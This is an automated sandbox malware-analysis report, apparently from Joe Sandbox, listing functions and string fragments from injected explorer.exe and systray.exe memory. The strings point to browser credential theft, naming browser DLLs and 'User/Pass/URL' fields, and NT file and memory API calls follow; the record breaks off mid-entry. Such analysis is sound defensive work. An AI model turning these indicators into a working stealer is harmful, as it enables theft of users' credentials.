Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 01B18870518B488EDB19EF68C485AEEB7F1FF98340F40891ED59AC7251EF70D9058B86

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE0622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

t, xrefs: 0DCE06C8
d, xrefs: 0DCE067B
e, xrefs: 0DCE066D
d, xrefs: 0DCE06A5
c, xrefs: 0DCE0697
u, xrefs: 0DCE0661
l, xrefs: 0DCE0682
d, xrefs: 0DCE06CF
p, xrefs: 0DCE0690
n, xrefs: 0DCE06BA
i, xrefs: 0DCE069E
l, xrefs: 0DCE06D6
w, xrefs: 0DCE06B3
2, xrefs: 0DCE0674
n, xrefs: 0DCE06C1
s, xrefs: 0DCE0689
l, xrefs: 0DCE06AC

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: f39d079ff3255ecbd619fdbeb77a6c64c8567e3e23f1ceffe1ccdff76efab9ab
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 1141BDB0A18B0C8FDB24DF88A4456BE7BE2FB88741F00025ED809D3246DBB5DD458BD6

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE7AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

], xrefs: 0DCE7CA8
e, xrefs: 0DCE7CA0
[, xrefs: 0DCE7CCD
l, xrefs: 0DCE7CE2
c, xrefs: 0DCE7C0B
l, xrefs: 0DCE7C35
], xrefs: 0DCE7C3D
n, xrefs: 0DCE7C98
[, xrefs: 0DCE7C90
D, xrefs: 0DCE7CDA
[, xrefs: 0DCE7C2D
[, xrefs: 0DCE7BF6
[, xrefs: 0DCE7C66
b, xrefs: 0DCE7C73

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: c8b6230c2be0788509b9f4c5b7bcb428101b183a2b09a24b8094c06d8cfd3e17
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: A4C15BB0618B098FC758EF64C885AAAF3E5FB94304F41472ED69AC7250DF30E615CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE7F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

c, xrefs: 0DCE7FC8
r, xrefs: 0DCE7FB8
r, xrefs: 0DCE7FA8
0, xrefs: 0DCE7F5B
r, xrefs: 0DCE7F98
r, xrefs: 0DCE7FB0
r, xrefs: 0DCE7FC0
., xrefs: 0DCE7F63
r, xrefs: 0DCE7F88
r, xrefs: 0DCE7F90
n, xrefs: 0DCE7F6B
r, xrefs: 0DCE7FA0

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 78fedaec4c20fabaa01b4aa3bc44349df4da39a02a02a5e1cb91c21356bedb1f
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 8F51BF7151C7488FD719DF18D8812AAB7E5FFC5740F501A2EE98BC7242DBB4D9068B82

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE12F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

opera_browser.dll, xrefs: 0DCE1629
dll, xrefs: 0DCE132E
sspi, xrefs: 0DCE1320
nspr, xrefs: 0DCE14D4
dragon_s.dll, xrefs: 0DCE1614
4.dl, xrefs: 0DCE14DB
l, xrefs: 0DCE14E2
cli., xrefs: 0DCE1327

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 2bb73841cecd149ccdc480d48645a008317c2293ebe113a9961e91d30516325e
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: BFC18FB1618A1D4FC758EB68D895AAAF3E5FF98340F554329850FC7250DF30EA029BC6

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE12F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

opera_browser.dll, xrefs: 0DCE1629
dll, xrefs: 0DCE132E
sspi, xrefs: 0DCE1320
nspr, xrefs: 0DCE14D4
dragon_s.dll, xrefs: 0DCE1614
4.dl, xrefs: 0DCE14DB
l, xrefs: 0DCE14E2
cli., xrefs: 0DCE1327

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 8bbd67e132038e00e9da59838b72de0da176504df86c900a3b5daab7eb8a8dd2
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 81C19EB0618A1D4FC758EF68D895AAAF3E5FF98340F554329850EC7250DF30EA029BC6

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE2CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

L: , xrefs: 0DCE2D66
2, xrefs: 0DCE2DE1
name, xrefs: 0DCE2DB2
UR, xrefs: 0DCE2D5F
word, xrefs: 0DCE2D9E
Pass, xrefs: 0DCE2D97
User, xrefs: 0DCE2DAB

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 99062a1573abcf4d03305b61aac39d53da6c548eb2de5a99c3a07dedbafe335f
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: E3A1BF70618B4C8FDB29EFA894447EEB7E1FF98340F00462DE58AD7242EA7095458789

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE2CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

L: , xrefs: 0DCE2D66
2, xrefs: 0DCE2DE1
name, xrefs: 0DCE2DB2
UR, xrefs: 0DCE2D5F
word, xrefs: 0DCE2D9E
Pass, xrefs: 0DCE2D97
User, xrefs: 0DCE2DAB

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 0f686eaefa4b526c84b120b657bf1d2fdacffca6875641e23fa337b2bbf25196
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 99919F70618B4C8FDB29EFA8D4447EEB7E1FF98340F00462DE48AD7242EB7495458B89

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE2352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

., xrefs: 0DCE23B0
, xrefs: 0DCE247C
n, xrefs: 0DCE23E7
v, xrefs: 0DCE24A0
e, xrefs: 0DCE248E

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: e452c06903ad28994d83a4fa75f0ab2ec3337b86a0969236dd4bf44a763a5fbe
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: EC719D71618B4C8FD758EFA8C4887AAB7F4FF98344F00062EE54AC7221EB70D9458B85

Uniqueness

Uniqueness Score: -1.00%

Function 0DCDDC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

2.dl, xrefs: 0DCDDC64
dll, xrefs: 0DCDDC9E
shel, xrefs: 0DCDDC90
ole3, xrefs: 0DCDDC5D
l32., xrefs: 0DCDDC97

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 889ce7dab0b438fc8327e12d6b2cbe8395467cc514c2e8b459030bfe248b9547
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 32513CB0918B4C8FDB54EFA4C045AEEB7F1FF58300F41462E959AE7214EF7096419B89

Uniqueness

Uniqueness Score: -1.00%

Function 0DCDE86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

dll, xrefs: 0DCDE8F4
\, xrefs: 0DCDE9E0
vers, xrefs: 0DCDE8E4
ion., xrefs: 0DCDE8EC
4, xrefs: 0DCDE9E9

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 2c1569b22f3351ff28ce9c4901a1714e8dfabceaee2ca2388451c935c813b7ca
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 5A41A470618B8D8FDBB5EF6498457EA77E4FB98301F51462E998ECB240EF30D5058782

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE04B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

cli., xrefs: 0DCE0515
sspi, xrefs: 0DCE050E
32.d, xrefs: 0DCE04DA
dll, xrefs: 0DCE051C
user, xrefs: 0DCE04D3

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: b58695d59f56c82e27aeeb66a2aa4fe48fa5c00c5f74c70c600d21d670c034d1
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: B84192B0A59F0D8FCB58EF58C0953AD73E5FB68340F50456AA80ED3200DAB4D641DBC6

Uniqueness

Uniqueness Score: -1.00%

Function 0DCDE432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

.dll, xrefs: 0DCDE53F
kern, xrefs: 0DCDE52A
h, xrefs: 0DCDE51F
el32, xrefs: 0DCDE537

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 9e5b553876024a3226fa70ee31367ec95510612a9e6f1c081b907ac858a75059
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 28418070608B4C8FD7A9DF6884843BAB7E5FB98340F144A2EA69EC7255EB70C545CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE50B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

om:, xrefs: 0DCE5146
f fr, xrefs: 0DCE513D
, xrefs: 0DCE5184
Snif, xrefs: 0DCE5154

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 2a84605573ba66bc8a6990327cce3d348b24f9b28dd602d0ef41d39545769d58
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: C531E1B151CB8C5FC71AEB28C0846EAB7D4FB84340F50491EE59BC7252EE31E649CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE50C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

om:, xrefs: 0DCE5146
f fr, xrefs: 0DCE513D
, xrefs: 0DCE5184
Snif, xrefs: 0DCE5154

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 25772d1e2c530af83fa3fad3824bb89c265c0c3f46e7ed2f60be5d76466e6f38
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: DD31E1B151CB4C6FD71AEB28C4856EAB7D4FB94340F40491EE59BC3252EE31E606CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE0FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

chro, xrefs: 0DCE1023
hild, xrefs: 0DCE0FF6
.dll, xrefs: 0DCE0FFE
me_c, xrefs: 0DCE0FEE

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 7fc2d7ab77007b6c425cc7650db699e0c8162dc8c83f9b16a84de3664e1d85fe
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 6B319CB011CB4C4FCB85EF688495BAAB7E1FF98240F85062DA54ECB214DF30C605DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE0FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

chro, xrefs: 0DCE1023
hild, xrefs: 0DCE0FF6
.dll, xrefs: 0DCE0FFE
me_c, xrefs: 0DCE0FEE

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 76af5201d9164ee84036b708344bac229ad9c401d8ac7c304b2cd45647898a1d
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 3B318BB021CB4C8FCB85EF688494BAAB7E1FF98340F95062D954ACB254DF30C605DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE38C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 0DCE3935, 0DCE3948
urlmon.dll, xrefs: 0DCE3959
nt: , xrefs: 0DCE391E
on.d, xrefs: 0DCE3902

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: edc23368b647a30ebb1f1aee49c942014f158373882b1e8a26bf435a40b8141d
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 5B31CE71614A4C8FCB04EFA8C8847EEBBE4FB58245F41022AD54ED7240DF788A498B89

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE38BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 0DCE3935, 0DCE3948
urlmon.dll, xrefs: 0DCE3959
nt: , xrefs: 0DCE391E
on.d, xrefs: 0DCE3902

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 4aacc78650e22b30901d95fb42784ad0fe3b73b6028c9e51f2f2916ee769220a
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 1821E1B0A14A4C8FCB04EFA9C8847EDBBE4FF58245F41422AE55AD7240DF74C649CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE4E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0DCE4F26
., xrefs: 0DCE4F1F
l, xrefs: 0DCE4F03
t, xrefs: 0DCE4EF4

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 7282ee8c354dcf5e3d4c25bf41b940b9fb84418d2f17d7b24fbfefdbd4998e4c
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 132148B0A28A0D9FDB08EFA8D0447EDBAF1FB58304F51462ED109D3600DB74D6518B84

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE4E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0DCE4F26
., xrefs: 0DCE4F1F
l, xrefs: 0DCE4F03
t, xrefs: 0DCE4EF4

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 3657e99e4c9e46a4fe5bd22fd4cd9fbc50c36580791b8f8c188b1f88da7ad210
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: D6215AB0A28A0D9FDB48EFA8D0447AEBAF1FF58304F51462ED109D3610DB74D5918B84

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE4FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

auth, xrefs: 0DCE502F
pass, xrefs: 0DCE5022
logi, xrefs: 0DCE503C
user, xrefs: 0DCE5015

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: cd78d772c48930ed60d1d748c16e2bac800d6a0a066dd4bf1adec733d32e2177
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 8F21C070628B0D8BCB05DF9998806EEB7E1EF88384F014619E40AEB249D7B1D9148BC2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: systray.exePID: 7928, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	592
Total number of Limit Nodes:	69

Executed Functions

Function 02D1A350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02D14BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D14BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02D1A39D

Strings

.z`, xrefs: 02D1A38D, 02D1A398

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 992cdf03515f09ac965a2d75daba868a4ebc3fb2814bfa18f44f924eebf09515
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 48F0BDB2205208AFCB08CF88DC84EEB77ADAF8C754F158248BA1D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D1A400 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02D14D62,5EB65239,FFFFFFFF,02D14A21,?,?,02D14D62,?,02D14A21,FFFFFFFF,5EB65239,02D14D62,?,00000000), ref: 02D1A445

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: daa22aa87ee568699752004377fa16c79f935de87df349c5d842af18f00ba5a7
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 90F0A4B2200208AFCB14DF89DC80EEB77ADEF8C754F158248BA1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D1A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D02D11,00002000,00003000,00000004), ref: 02D1A569

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 231519c56c863cffc34497dae8c512d49099663aaa1c0b9ef9b384fbb1b85e20
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 75F015B2200208AFCB14DF89DC80EAB77ADEF88754F118148BE1C97241C630F810CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D1A52A Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D02D11,00002000,00003000,00000004), ref: 02D1A569

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 33da857c462814b0e4859ef38ad2c50ccbd1735164ec33851ee6405a57418289
Instruction ID: 2a1bcc7a6fd5305e4837e86e54576c2e97793d38ef4c175438bde1db59949e4d
Opcode Fuzzy Hash: 33da857c462814b0e4859ef38ad2c50ccbd1735164ec33851ee6405a57418289
Instruction Fuzzy Hash: EEF0F8B6204208ABDB18DF98DC91EE777ADAF88354F158558BE1C97351C630E810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D1A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02D14D40,?,?,02D14D40,00000000,FFFFFFFF), ref: 02D1A4A5

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 12132a1861f714b41f214c5f6cd7b617759e7a39c7aecd9dd15cc2eecb3d2287
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
